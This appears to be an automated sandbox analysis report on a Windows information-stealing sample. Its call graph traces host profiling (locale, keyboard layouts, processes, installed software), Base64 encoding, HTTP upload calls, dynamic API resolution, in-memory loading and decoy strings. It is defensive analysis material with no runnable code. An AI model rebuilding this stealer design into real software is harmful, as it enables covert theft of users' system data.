57a8a0 lstrcpy 15093->15094 15095 571ec5 15094->15095 15096 57a9b0 4 API calls 15095->15096 15097 571ee5 15096->15097 15098 57a8a0 lstrcpy 15097->15098 15099 571eee 15098->15099 15735 577b00 GetUserDefaultLocaleName 15099->15735 15102 57a9b0 4 API calls 15103 571f0e 15102->15103 15104 57a8a0 lstrcpy 15103->15104 15105 571f17 15104->15105 15106 57a9b0 4 API calls 15105->15106 15107 571f36 15106->15107 15108 57a8a0 lstrcpy 15107->15108 15109 571f3f 15108->15109 15110 57a9b0 4 API calls 15109->15110 15111 571f60 15110->15111 15112 57a8a0 lstrcpy 15111->15112 15113 571f69 15112->15113 15739 577b90 15113->15739 15115 571f80 15116 57a920 3 API calls 15115->15116 15117 571f93 15116->15117 15118 57a8a0 lstrcpy 15117->15118 15119 571f9c 15118->15119 15120 57a9b0 4 API calls 15119->15120 15121 571fc6 15120->15121 15122 57a8a0 lstrcpy 15121->15122 15123 571fcf 15122->15123 15124 57a9b0 4 API calls 15123->15124 15125 571fef 15124->15125 15126 57a8a0 lstrcpy 15125->15126 15127 571ff8 15126->15127 15751 577d80 GetSystemPowerStatus 15127->15751 15130 57a9b0 4 API calls 15131 572018 15130->15131 15132 57a8a0 lstrcpy 15131->15132 15133 572021 15132->15133 15134 57a9b0 4 API calls 15133->15134 15135 572040 15134->15135 15136 57a8a0 lstrcpy 15135->15136 15137 572049 15136->15137 15138 57a9b0 4 API calls 15137->15138 15139 57206a 15138->15139 15140 57a8a0 lstrcpy 15139->15140 15141 572073 15140->15141 15142 57207e GetCurrentProcessId 15141->15142 15753 579470 OpenProcess 15142->15753 15145 57a920 3 API calls 15146 5720a4 15145->15146 15147 57a8a0 lstrcpy 15146->15147 15148 5720ad 15147->15148 15149 57a9b0 4 API calls 15148->15149 15150 5720d7 15149->15150 15151 57a8a0 lstrcpy 15150->15151 15152 5720e0 15151->15152 15153 57a9b0 4 API calls 15152->15153 15154 572100 15153->15154 15155 57a8a0 lstrcpy 15154->15155 15156 572109 15155->15156 15758 577e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15156->15758 15159 57a9b0 4 API calls 15160 572129 15159->15160 15161 57a8a0 lstrcpy 15160->15161 15162 572132 15161->15162 15163 57a9b0 4 API calls 15162->15163 15164 572151 15163->15164 15165 57a8a0 lstrcpy 15164->15165 15166 57215a 15165->15166 15167 57a9b0 4 API calls 15166->15167 15168 57217b 15167->15168 15169 57a8a0 lstrcpy 15168->15169 15170 572184 15169->15170 15762 577f60 15170->15762 15173 57a9b0 4 API calls 15174 5721a4 15173->15174 15175 57a8a0 lstrcpy 15174->15175 15176 5721ad 15175->15176 15177 57a9b0 4 API calls 15176->15177 15178 5721cc 15177->15178 15179 57a8a0 lstrcpy 15178->15179 15180 5721d5 15179->15180 15181 57a9b0 4 API calls 15180->15181 15182 5721f6 15181->15182 15183 57a8a0 lstrcpy 15182->15183 15184 5721ff 15183->15184 15775 577ed0 GetSystemInfo wsprintfA 15184->15775 15187 57a9b0 4 API calls 15188 57221f 15187->15188 15189 57a8a0 lstrcpy 15188->15189 15190 572228 15189->15190 15191 57a9b0 4 API calls 15190->15191 15192 572247 15191->15192 15193 57a8a0 lstrcpy 15192->15193 15194 572250 15193->15194 15195 57a9b0 4 API calls 15194->15195 15196 572270 15195->15196 15197 57a8a0 lstrcpy 15196->15197 15198 572279 15197->15198 15777 578100 GetProcessHeap RtlAllocateHeap 15198->15777 15201 57a9b0 4 API calls 15202 572299 15201->15202 15203 57a8a0 lstrcpy 15202->15203 15204 5722a2 15203->15204 15205 57a9b0 4 API calls 15204->15205 15206 5722c1 15205->15206 15207 57a8a0 lstrcpy 15206->15207 15208 5722ca 15207->15208 15209 57a9b0 4 API calls 15208->15209 15210 5722eb 15209->15210 15211 57a8a0 lstrcpy 15210->15211 15212 5722f4 15211->15212 15783 5787c0 15212->15783 15215 57a920 3 API calls 15216 57231e 15215->15216 15217 57a8a0 lstrcpy 15216->15217 15218 572327 15217->15218 15219 57a9b0 4 API calls 15218->15219 15220 572351 15219->15220 15221 57a8a0 lstrcpy 15220->15221 15222 57235a 15221->15222 15223 57a9b0 4 API calls 15222->15223 15224 57237a 15223->15224 15225 57a8a0 lstrcpy 15224->15225 15226 572383 15225->15226 15227 57a9b0 4 API calls 15226->15227 15228 5723a2 15227->15228 15229 57a8a0 lstrcpy 15228->15229 15230 5723ab 15229->15230 15788 5781f0 15230->15788 15232 5723c2 15233 57a920 3 API calls 15232->15233 15234 5723d5 15233->15234 15235 57a8a0 lstrcpy 15234->15235 15236 5723de 15235->15236 15237 57a9b0 4 API calls 15236->15237 15238 57240a 15237->15238 15239 57a8a0 lstrcpy 15238->15239 15240 572413 15239->15240 15241 57a9b0 4 API calls 15240->15241 15242 572432 15241->15242 15243 57a8a0 lstrcpy 15242->15243 15244 57243b 15243->15244 15245 57a9b0 4 API calls 15244->15245 15246 57245c 15245->15246 15247 57a8a0 lstrcpy 15246->15247 15248 572465 15247->15248 15249 57a9b0 4 API calls 15248->15249 15250 572484 15249->15250 15251 57a8a0 lstrcpy 15250->15251 15252 57248d 15251->15252 15253 57a9b0 4 API calls 15252->15253 15254 5724ae 15253->15254 15255 57a8a0 lstrcpy 15254->15255 15256 5724b7 15255->15256 15796 578320 15256->15796 15258 5724d3 15259 57a920 3 API calls 15258->15259 15260 5724e6 15259->15260 15261 57a8a0 lstrcpy 15260->15261 15262 5724ef 15261->15262 15263 57a9b0 4 API calls 15262->15263 15264 572519 15263->15264 15265 57a8a0 lstrcpy 15264->15265 15266 572522 15265->15266 15267 57a9b0 4 API calls 15266->15267 15268 572543 15267->15268 15269 57a8a0 lstrcpy 15268->15269 15270 57254c 15269->15270 15271 578320 17 API calls 15270->15271 15272 572568 15271->15272 15273 57a920 3 API calls 15272->15273 15274 57257b 15273->15274 15275 57a8a0 lstrcpy 15274->15275 15276 572584 15275->15276 15277 57a9b0 4 API calls 15276->15277 15278 5725ae 15277->15278 15279 57a8a0 lstrcpy 15278->15279 15280 5725b7 15279->15280 15281 57a9b0 4 API calls 15280->15281 15282 5725d6 15281->15282 15283 57a8a0 lstrcpy 15282->15283 15284 5725df 15283->15284 15285 57a9b0 4 API calls 15284->15285 15286 572600 15285->15286 15287 57a8a0 lstrcpy 15286->15287 15288 572609 15287->15288 15832 578680 15288->15832 15290 572620 15291 57a920 3 API calls 15290->15291 15292 572633 15291->15292 15293 57a8a0 lstrcpy 15292->15293 15294 57263c 15293->15294 15295 57265a lstrlen 15294->15295 15296 57266a 15295->15296 15297 57a740 lstrcpy 15296->15297 15298 57267c 15297->15298 15299 561590 lstrcpy 15298->15299 15300 57268d 15299->15300 15842 575190 15300->15842 15302 572699 15302->13734 16030 57aad0 15303->16030 15305 565009 InternetOpenUrlA 15308 565021 15305->15308 15306 5650a0 InternetCloseHandle InternetCloseHandle 15309 5650ec 15306->15309 15307 56502a InternetReadFile 15307->15308 15308->15306 15308->15307 15309->13738 16031 5698d0 15310->16031 15312 570759 15313 57077d 15312->15313 15314 570a38 15312->15314 15316 570799 StrCmpCA 15313->15316 15315 561590 lstrcpy 15314->15315 15317 570a49 15315->15317 15318 570843 15316->15318 15319 5707a8 15316->15319 16207 570250 15317->16207 15324 570865 StrCmpCA 15318->15324 15321 57a7a0 lstrcpy 15319->15321 15323 5707c3 15321->15323 15326 561590 lstrcpy 15323->15326 15325 570874 15324->15325 15362 57096b 15324->15362 15327 57a740 lstrcpy 15325->15327 15328 57080c 15326->15328 15330 570881 15327->15330 15331 57a7a0 lstrcpy 15328->15331 15329 57099c StrCmpCA 15332 570a2d 15329->15332 15333 5709ab 15329->15333 15334 57a9b0 4 API calls 15330->15334 15335 570823 15331->15335 15332->13742 15336 561590 lstrcpy 15333->15336 15337 5708ac 15334->15337 15338 57a7a0 lstrcpy 15335->15338 15339 5709f4 15336->15339 15340 57a920 3 API calls 15337->15340 15341 57083e 15338->15341 15342 57a7a0 lstrcpy 15339->15342 15343 5708b3 15340->15343 16034 56fb00 15341->16034 15345 570a0d 15342->15345 15346 57a9b0 4 API calls 15343->15346 15347 57a7a0 lstrcpy 15345->15347 15348 5708ba 15346->15348 15349 570a28 15347->15349 15350 57a8a0 lstrcpy 15348->15350 16150 570030 15349->16150 15362->15329 15682 57a7a0 lstrcpy 15681->15682 15683 561683 15682->15683 15684 57a7a0 lstrcpy 15683->15684 15685 561695 15684->15685 15686 57a7a0 lstrcpy 15685->15686 15687 5616a7 15686->15687 15688 57a7a0 lstrcpy 15687->15688 15689 5615a3 15688->15689 15689->14565 15691 5647c6 15690->15691 15692 564838 lstrlen 15691->15692 15716 57aad0 15692->15716 15694 564848 InternetCrackUrlA 15695 564867 15694->15695 15695->14642 15697 57a740 lstrcpy 15696->15697 15698 578b74 15697->15698 15699 57a740 lstrcpy 15698->15699 15700 578b82 GetSystemTime 15699->15700 15701 578b99 15700->15701 15702 57a7a0 lstrcpy 15701->15702 15703 578bfc 15702->15703 15703->14657 15705 57a931 15704->15705 15706 57a988 15705->15706 15708 57a968 lstrcpy lstrcat 15705->15708 15707 57a7a0 lstrcpy 15706->15707 15709 57a994 15707->15709 15708->15706 15709->14660 15710->14775 15712 564eee 15711->15712 15713 569af9 LocalAlloc 15711->15713 15712->14663 15712->14666 15713->15712 15714 569b14 CryptStringToBinaryA 15713->15714 15714->15712 15715 569b39 LocalFree 15714->15715 15715->15712 15716->15694 15717->14785 15718->14926 15719->14928 15720->14936 15849 5777a0 15721->15849 15724 5776c6 RegOpenKeyExA 15726 5776e7 RegQueryValueExA 15724->15726 15727 577704 RegCloseKey 15724->15727 15725 571c1e 15725->15018 15726->15727 15727->15725 15729 571c99 15728->15729 15729->15032 15731 571e09 15730->15731 15731->15074 15733 571e84 15732->15733 15734 577a9a wsprintfA 15732->15734 15733->15088 15734->15733 15736 571efe 15735->15736 15737 577b4d 15735->15737 15736->15102 15856 578d20 LocalAlloc CharToOemW 15737->15856 15740 57a740 lstrcpy 15739->15740 15741 577bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15740->15741 15744 577c25 15741->15744 15742 577c46 GetLocaleInfoA 15742->15744 15743 577d18 15745 577d1e LocalFree 15743->15745 15746 577d28 15743->15746 15744->15742 15744->15743 15747 57a9b0 lstrcpy lstrlen lstrcpy lstrcat 15744->15747 15750 57a8a0 lstrcpy 15744->15750 15745->15746 15748 57a7a0 lstrcpy 15746->15748 15747->15744 15749 577d37 15748->15749 15749->15115 15750->15744 15752 572008 15751->15752 15752->15130 15754 5794b5 15753->15754 15755 579493 GetModuleFileNameExA CloseHandle 15753->15755 15756 57a740 lstrcpy 15754->15756 15755->15754 15757 572091 15756->15757 15757->15145 15759 572119 15758->15759 15760 577e68 RegQueryValueExA 15758->15760 15759->15159 15761 577e8e RegCloseKey 15760->15761 15761->15759 15763 577fb9 GetLogicalProcessorInformationEx 15762->15763 15764 577fd8 GetLastError 15763->15764 15769 578029 15763->15769 15765 578022 15764->15765 15774 577fe3 15764->15774 15768 572194 15765->15768 15771 5789f0 2 API calls 15765->15771 15768->15173 15770 5789f0 2 API calls 15769->15770 15772 57807b 15770->15772 15771->15768 15772->15765 15773 578084 wsprintfA 15772->15773 15773->15768 15774->15763 15774->15768 15857 5789f0 15774->15857 15860 578a10 GetProcessHeap RtlAllocateHeap 15774->15860 15776 57220f 15775->15776 15776->15187 15778 5789b0 15777->15778 15779 57814d GlobalMemoryStatusEx 15778->15779 15782 578163 __aulldiv 15779->15782 15780 57819b wsprintfA 15781 572289 15780->15781 15781->15201 15782->15780 15784 5787fb GetProcessHeap RtlAllocateHeap wsprintfA 15783->15784 15786 57a740 lstrcpy 15784->15786 15787 57230b 15786->15787 15787->15215 15789 57a740 lstrcpy 15788->15789 15795 578229 15789->15795 15790 578263 15791 57a7a0 lstrcpy 15790->15791 15793 5782dc 15791->15793 15792 57a9b0 lstrcpy lstrlen lstrcpy lstrcat 15792->15795 15793->15232 15794 57a8a0 lstrcpy 15794->15795 15795->15790 15795->15792 15795->15794 15797 57a740 lstrcpy 15796->15797 15798 57835c RegOpenKeyExA 15797->15798 15799 5783d0 15798->15799 15800 5783ae 15798->15800 15802 578613 RegCloseKey 15799->15802 15803 5783f8 RegEnumKeyExA 15799->15803 15801 57a7a0 lstrcpy 15800->15801 15811 5783bd 15801->15811 15806 57a7a0 lstrcpy 15802->15806 15804 57843f wsprintfA RegOpenKeyExA 15803->15804 15805 57860e 15803->15805 15807 578485 RegCloseKey RegCloseKey 15804->15807 15808 5784c1 RegQueryValueExA 15804->15808 15805->15802 15806->15811 15812 57a7a0 lstrcpy 15807->15812 15809 578601 RegCloseKey 15808->15809 15810 5784fa lstrlen 15808->15810 15809->15805 15810->15809 15813 578510 15810->15813 15811->15258 15812->15811 15814 57a9b0 4 API calls 15813->15814 15815 578527 15814->15815 15816 57a8a0 lstrcpy 15815->15816 15817 578533 15816->15817 15818 57a9b0 4 API calls 15817->15818 15819 578557 15818->15819 15820 57a8a0 lstrcpy 15819->15820 15821 578563 15820->15821 15822 57856e RegQueryValueExA 15821->15822 15822->15809 15823 5785a3 15822->15823 15824 57a9b0 4 API calls 15823->15824 15825 5785ba 15824->15825 15826 57a8a0 lstrcpy 15825->15826 15827 5785c6 15826->15827 15828 57a9b0 4 API calls 15827->15828 15829 5785ea 15828->15829 15830 57a8a0 lstrcpy 15829->15830 15831 5785f6 15830->15831 15831->15809 15833 57a740 lstrcpy 15832->15833 15834 5786bc CreateToolhelp32Snapshot Process32First 15833->15834 15835 57875d CloseHandle 15834->15835 15836 5786e8 Process32Next 15834->15836 15837 57a7a0 lstrcpy 15835->15837 15836->15835 15841 5786fd 15836->15841 15839 578776 15837->15839 15838 57a8a0 lstrcpy 15838->15841 15839->15290 15840 57a9b0 lstrcpy lstrlen lstrcpy lstrcat 15840->15841 15841->15836 15841->15838 15841->15840 15843 57a7a0 lstrcpy 15842->15843 15844 5751b5 15843->15844 15845 561590 lstrcpy 15844->15845 15846 5751c6 15845->15846 15861 565100 15846->15861 15848 5751cf 15848->15302 15852 577720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15849->15852 15851 5776b9 15851->15724 15851->15725 15853 577765 RegQueryValueExA 15852->15853 15854 577780 RegCloseKey 15852->15854 15853->15854 15855 577793 15854->15855 15855->15851 15856->15736 15858 578a0c 15857->15858 15859 5789f9 GetProcessHeap HeapFree 15857->15859 15858->15774 15859->15858 15860->15774 15862 57a7a0 lstrcpy 15861->15862 15863 565119 15862->15863 15864 5647b0 2 API calls 15863->15864 15865 565125 15864->15865 16021 578ea0 15865->16021 15867 565184 15868 565192 lstrlen 15867->15868 15869 5651a5 15868->15869 15870 578ea0 4 API calls 15869->15870 15871 5651b6 15870->15871 15872 57a740 lstrcpy 15871->15872 15873 5651c9 15872->15873 15874 57a740 lstrcpy 15873->15874 15875 5651d6 15874->15875 15876 57a740 lstrcpy 15875->15876 15877 5651e3 15876->15877 15878 57a740 lstrcpy 15877->15878 15879 5651f0 15878->15879 15880 57a740 lstrcpy 15879->15880 15881 5651fd InternetOpenA StrCmpCA 15880->15881 15882 56522f 15881->15882 15883 5658c4 InternetCloseHandle 15882->15883 15884 578b60 3 API calls 15882->15884 15890 5658d9 codecvt 15883->15890 15885 56524e 15884->15885 15886 57a920 3 API calls 15885->15886 15887 565261 15886->15887 15888 57a8a0 lstrcpy 15887->15888 15889 56526a 15888->15889 15891 57a9b0 4 API calls 15889->15891 15894 57a7a0 lstrcpy 15890->15894 15892 5652ab 15891->15892 15893 57a920 3 API calls 15892->15893 15895 5652b2 15893->15895 15902 565913 15894->15902 15896 57a9b0 4 API calls 15895->15896 15897 5652b9 15896->15897 15898 57a8a0 lstrcpy 15897->15898 15899 5652c2 15898->15899 15900 57a9b0 4 API calls 15899->15900 15901 565303 15900->15901 15903 57a920 3 API calls 15901->15903 15902->15848 15904 56530a 15903->15904 15905 57a8a0 lstrcpy 15904->15905 15906 565313 15905->15906 15907 565329 InternetConnectA 15906->15907 15907->15883 15908 565359 HttpOpenRequestA 15907->15908 15910 5658b7 InternetCloseHandle 15908->15910 15911 5653b7 15908->15911 15910->15883 15912 57a9b0 4 API calls 15911->15912 15913 5653cb 15912->15913 15914 57a8a0 lstrcpy 15913->15914 15915 5653d4 15914->15915 15916 57a920 3 API calls 15915->15916 15917 5653f2 15916->15917 15918 57a8a0 lstrcpy 15917->15918 15919 5653fb 15918->15919 15920 57a9b0 4 API calls 15919->15920 15921 56541a 15920->15921 15922 57a8a0 lstrcpy 15921->15922 15923 565423 15922->15923 15924 57a9b0 4 API calls 15923->15924 15925 565444 15924->15925 15926 57a8a0 lstrcpy 15925->15926 15927 56544d 15926->15927 15928 57a9b0 4 API calls 15927->15928 15929 56546e 15928->15929 15930 57a8a0 lstrcpy 15929->15930 16022 578ead CryptBinaryToStringA 16021->16022 16023 578ea9 16021->16023 16022->16023 16024 578ece GetProcessHeap RtlAllocateHeap 16022->16024 16023->15867 16024->16023 16025 578ef4 codecvt 16024->16025 16026 578f05 CryptBinaryToStringA 16025->16026 16026->16023 16030->15305 16273 569880 16031->16273 16033 5698e1 16033->15312 16035 57a740 lstrcpy 16034->16035 16036 56fb16 16035->16036 16208 57a740 lstrcpy 16207->16208 16209 570266 16208->16209 16210 578de0 2 API calls 16209->16210 16211 57027b 16210->16211 16212 57a920 3 API calls 16211->16212 16213 57028b 16212->16213 16214 57a8a0 lstrcpy 16213->16214 16215 570294 16214->16215 16216 57a9b0 4 API calls 16215->16216 16217 5702b8 16216->16217 16274 56988e 16273->16274 16277 566fb0 16274->16277 16276 5698ad codecvt 16276->16033 16280 566d40 16277->16280 16281 566d63 16280->16281 16292 566d59 16280->16292 16281->16292 16294 566660 16281->16294 16283 566dbe 16283->16292 16300 5669b0 16283->16300 16285 566e2a 16286 566ee6 VirtualFree 16285->16286 16288 566ef7 16285->16288 16285->16292 16286->16288 16287 566f41 16289 5789f0 2 API calls 16287->16289 16287->16292 16288->16287 16290 566f26 FreeLibrary 16288->16290 16291 566f38 16288->16291 16289->16292 16290->16288 16293 5789f0 2 API calls 16291->16293 16292->16276 16293->16287 16295 56668f VirtualAlloc 16294->16295 16297 566730 16295->16297 16299 56673c 16295->16299 16298 566743 VirtualAlloc 16297->16298 16297->16299 16298->16299 16299->16283 16301 5669c9 16300->16301 16306 5669d5 16300->16306 16302 566a09 LoadLibraryA 16301->16302 16301->16306 16304 566a32 16302->16304 16302->16306 16303 566ae0 16303->16306 16307 566ba8 GetProcAddress 16303->16307 16304->16303 16310 578a10 GetProcessHeap RtlAllocateHeap 16304->16310 16306->16285 16307->16303 16307->16306 16308 5789f0 2 API calls 16308->16303 16309 566a8b 16309->16306 16309->16308 16310->16309

                            Executed Functions

                            Function 00579860 Relevance: 84.2, APIs: 33, Strings: 15, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 579860-579874 call 579750 663 579a93-579af2 LoadLibraryA * 5 660->663 664 57987a-579a8e call 579780 GetProcAddress * 21 660->664 665 579af4-579b08 GetProcAddress 663->665 666 579b0d-579b14 663->666 664->663 665->666 669 579b46-579b4d 666->669 670 579b16-579b41 GetProcAddress * 2 666->670 671 579b4f-579b63 GetProcAddress 669->671 672 579b68-579b6f 669->672 670->669 671->672 673 579b71-579b84 GetProcAddress 672->673 674 579b89-579b90 672->674 673->674 675 579b92-579bbc GetProcAddress * 2 674->675 676 579bc1-579bc2 674->676 675->676
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00E424A0), ref: 005798A1
                            • GetProcAddress.KERNEL32(74DD0000,00E423F8), ref: 005798BA
                            • GetProcAddress.KERNEL32(74DD0000,00E42230), ref: 005798D2
                            • GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 005798EA
                            • GetProcAddress.KERNEL32(74DD0000,00E42410), ref: 00579903
                            • GetProcAddress.KERNEL32(74DD0000,00E49148), ref: 0057991B
                            • GetProcAddress.KERNEL32(74DD0000,00E357B0), ref: 00579933
                            • GetProcAddress.KERNEL32(74DD0000,00E35930), ref: 0057994C
                            • GetProcAddress.KERNEL32(74DD0000,00E424E8), ref: 00579964
                            • GetProcAddress.KERNEL32(74DD0000,00E422F0), ref: 0057997C
                            • GetProcAddress.KERNEL32(74DD0000,00E42350), ref: 00579995
                            • GetProcAddress.KERNEL32(74DD0000,00E424B8), ref: 005799AD
                            • GetProcAddress.KERNEL32(74DD0000,00E35810), ref: 005799C5
                            • GetProcAddress.KERNEL32(74DD0000,00E423C8), ref: 005799DE
                            • GetProcAddress.KERNEL32(74DD0000,00E423B0), ref: 005799F6
                            • GetProcAddress.KERNEL32(74DD0000,00E35870), ref: 00579A0E
                            • GetProcAddress.KERNEL32(74DD0000,00E42428), ref: 00579A27
                            • GetProcAddress.KERNEL32(74DD0000,00E42488), ref: 00579A3F
                            • GetProcAddress.KERNEL32(74DD0000,00E359D0), ref: 00579A57
                            • GetProcAddress.KERNEL32(74DD0000,00E422A8), ref: 00579A70
                            • GetProcAddress.KERNEL32(74DD0000,00E35A50), ref: 00579A88
                            • LoadLibraryA.KERNEL32(00E42380,?,00576A00), ref: 00579A9A
                            • LoadLibraryA.KERNEL32(00E42470,?,00576A00), ref: 00579AAB
                            • LoadLibraryA.KERNEL32(00E42338,?,00576A00), ref: 00579ABD
                            • LoadLibraryA.KERNEL32(00E42248,?,00576A00), ref: 00579ACF
                            • LoadLibraryA.KERNEL32(00E424D0,?,00576A00), ref: 00579AE0
                            • GetProcAddress.KERNEL32(75A70000,00E42278), ref: 00579B02
                            • GetProcAddress.KERNEL32(75290000,00E42500), ref: 00579B23
                            • GetProcAddress.KERNEL32(75290000,00E42368), ref: 00579B3B
                            • GetProcAddress.KERNEL32(75BD0000,00E42218), ref: 00579B5D
                            • GetProcAddress.KERNEL32(75450000,00E358B0), ref: 00579B7E
                            • GetProcAddress.KERNEL32(76E90000,00E491E8), ref: 00579B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00579BB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: #$($$0"$0Y$8#$H"$NtQueryInformationProcess$P#$PZ$h#$p$$pX$x"$#$$
                            • API String ID: 2238633743-3980375894
                            • Opcode ID: b64390886b91748c732b6dcd285481374ac43d1363934a9296a1ea46cc0dd26e
                            • Instruction ID: be21015b1f53a35d2aff094fdd8cffb4045de5611c0214bd9d02cb88e08cbea5
                            • Opcode Fuzzy Hash: b64390886b91748c732b6dcd285481374ac43d1363934a9296a1ea46cc0dd26e
                            • Instruction Fuzzy Hash: 90A16BB5500250FFD395EFA8ED88A663BF9F7DE301704C51AA60983264D73DA841CF2A
                            Function 005645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 5645c0-564695 RtlAllocateHeap 781 5646a0-5646a6 764->781 782 56474f-5647a9 VirtualProtect 781->782 783 5646ac-56474a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0056460E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0056479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005645D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005645DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0056466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005645F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0056474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0056462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0056475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005646AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0056477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005645C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005645E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005646CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005646C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0056473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005646D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0056471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00564657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005646B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
